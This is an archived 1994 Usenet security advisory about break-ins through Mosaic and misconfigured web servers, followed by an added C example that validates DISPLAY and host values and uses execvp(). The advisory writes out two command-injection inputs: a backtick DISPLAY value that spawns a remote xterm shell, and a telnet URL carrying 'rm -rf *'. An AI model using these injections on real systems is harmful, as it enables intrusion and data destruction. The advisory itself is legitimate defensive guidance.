mosaic and security- detailed info and request

Ken Case kc
Thu Mar 24 20:37:22 PST 1994


>Path: news.omnigroup.com!netcomsv!amd!amdahl!pacbell.com!ihnp4.ucsd.edu!galaxy.ucr.edu!library.ucla.edu!agate!howland.reston.ans.net!usc!elroy.jpl.nasa.gov!netline-fddi.jpl.nasa.gov!nntp-server.caltech.edu!vicki
>From: vicki at cco.caltech.edu (Vicki Brown)
>Newsgroups: comp.sys.sun.admin,comp.unix.admin,comp.infosystems.www
>Subject: mosaic and security- detailed info and request
>Date: 24 Mar 1994 23:21:24 GMT
>Organization: California Institute of Technology, Pasadena
>Lines: 88
>Message-ID: <2mt79k$8h6 at gap.cco.caltech.edu>
>NNTP-Posting-Host: piccolo.cco.caltech.edu
>X-Newsreader: NN version 6.5.0 #4 (NOV)

I am currently gathering information about Mosaic in relation to security
and computer break-ins.  While what I have is by no means exhaustive, it is
informative and timely enough that I will send out what I have as it is.  You
will be updated when I get more information, and please contact me at
vicki at citsrl.caltech.edu if you have anything to add/suggest/comment.

I have now heard of one tested and true way to gain a shell process on a 
remote computer using Mosaic.  This way exploits _improperly configured 
servers_ and can be avoided.  I have also heard of ways to configure your
server to gain access to those machines that users are on who access your
server. I will mention that those at ncsa who run Mosaic have not made this
information available on the web and should.

~Aggressive breaking in

	You may have noticed places on the web where it has been set up to
query you for information, perhaps by opening a new window for you to type
information in.  To open this new window it is necessary to query your
computer for its display information (it cannot rely on your host name, as
you might be running Mosaic remotely, as I have many times).  Thus, if you
set your environment variable to:

DISPLAY='lupi.srl.caltech.edu `xterm -display lupi.srl.caltech.edu:0.0`'

you could potentially have the remote Mosaic server donate a shell process
to running this xterm on your -display.  Voila.  You have broken in.
	To avoid this entirely, DO NOT RUN SCRIPTS THROUGH HTML.  If you do
run scripts from Mosaic (I'm talking about the kind that you write yourself
and then reference through URL), take some precautions.  This particular way of
using the DISPLAY variable could be avoided by reading the DISPLAY variable
before pushing it through a system() call, and using only the valid displays.
The guy who "discovered" this cracked computers at, among other places, MIT.  
As far as I know, the purely html commands are entirely safe from this.

~Passive breaking in

	There are several ways to write URLs in your html documents that will
execute harmful commands.  I have been told by someone who works in computer
security that you can wire unsafe things into the MIME viewer tables, like
is done with GhostScript, which is the pretty common PostScript viewer; this 
man saw someone wire up csh to a type: when someone references a document, 
the mosaic server opens up a csh on their machine- they've been broken 
into and don't know it.  The same man also says that you can use Mosaic to
"spoof protocols" and do things like use gopher to connect to the mail port 
as the user when the URL is dereferenced.  Another person detailed how you 
could make a URL such as:

  <a href="telnet://x;rm -rf *">ULTRA COOL GIFS HERE</a>

When this gets dereferenced, Mosaic executes the following command:

   system("xterm -e telnet x ; rm -rf *");

i.e., there goes your home directory.
	You can avoid these passive break-ins, too.  Pay attention to what 
URL is displayed at the bottom of your Mosaic screen when you move your cursor
over it and before you click on it, to notice things like xterm calls.  As
a server administrator, pay attention to all links in all documents, making 
sure that there is nothing untoward in there.  As an experienced friend 
wrote me, "If we all used pure HTML..., there would be no room for break-ins."

~Philosophy/Damage Control

	Yes, there are ways to break into systems using Mosaic.  Many of these
can be avoided on your part.  Mosaic is new, and there are probably as-yet-
undiscovered bugs in it.  This should not necessarily stop one from using
it, any more than sendmail bugs stop us from using sendmail; the bugs will
be fixed as they are discovered and new versions are released.  Meanwhile 
you can take steps to limit the damage that may be done if your system gets
broken into using your Mosaic server:

	1) create a separate user account for the web server, and cripple it,
		taking away its file write permissions, root access, etc.
	2) put the stuff in a safe chroot environment, perhaps by using Wietse
		Venema's chrootuid program (ftp ftp.win.tue.nl /pub/security)

Again, please let me know of any other ways to break in or secure a system.
Thanks.

Vicki
<vicki at citsrl.caltech.edu>


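A defensive counterpart to both the DISPLAY trick and the telnet:// URL described in the post, added here as an example; it is not part of Vicki's message or of Mosaic's own code. It validates the untrusted value before it reaches any command and starts the helper through execvp() on an argv array instead of system(), so no shell ever parses the value. The function names and the xterm/telnet argument layout are assumptions.

```c
/* Added example (not from the original post): validate an untrusted DISPLAY
 * value or telnet:// host before it reaches any command, and start the helper
 * with execvp() on an argv array so no shell ever parses the value. */
#include <ctype.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Host names may contain only letters, digits, '.' and '-'. Backticks,
 * spaces, ';' and the like are rejected rather than quoted. */
static int host_chars_ok(const char *p, const char *end)
{
    if (p == end || end - p > 255) return 0;
    for (; p < end; p++)
        if (!isalnum((unsigned char)*p) && *p != '.' && *p != '-') return 0;
    return 1;
}

int valid_host(const char *h) { return host_chars_ok(h, h + strlen(h)); }

/* DISPLAY must look like host:display[.screen] with numeric display/screen. */
int valid_display(const char *d)
{
    const char *colon = strchr(d, ':');
    if (!colon || !host_chars_ok(d, colon) || colon[1] == '\0') return 0;
    int dots = 0;
    for (const char *p = colon + 1; *p; p++) {
        if (*p == '.') { if (++dots > 1 || p[1] == '\0') return 0; }
        else if (!isdigit((unsigned char)*p)) return 0;
    }
    return 1;
}

/* Equivalent of system("xterm -display DISP -e telnet HOST") without the
 * shell: bad input is refused (-1) and never reaches exec. Returns the
 * child's exit status otherwise. */
int launch_telnet(const char *display, const char *host)
{
    if (!valid_display(display) || !valid_host(host)) return -1;
    char *argv[] = { "xterm", "-display", (char *)display,
                     "-e", "telnet", (char *)host, NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execvp(argv[0], argv); _exit(127); }
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The validator deliberately rejects a bare ":0" as well, since a remote user of the server must name the host their display lives on.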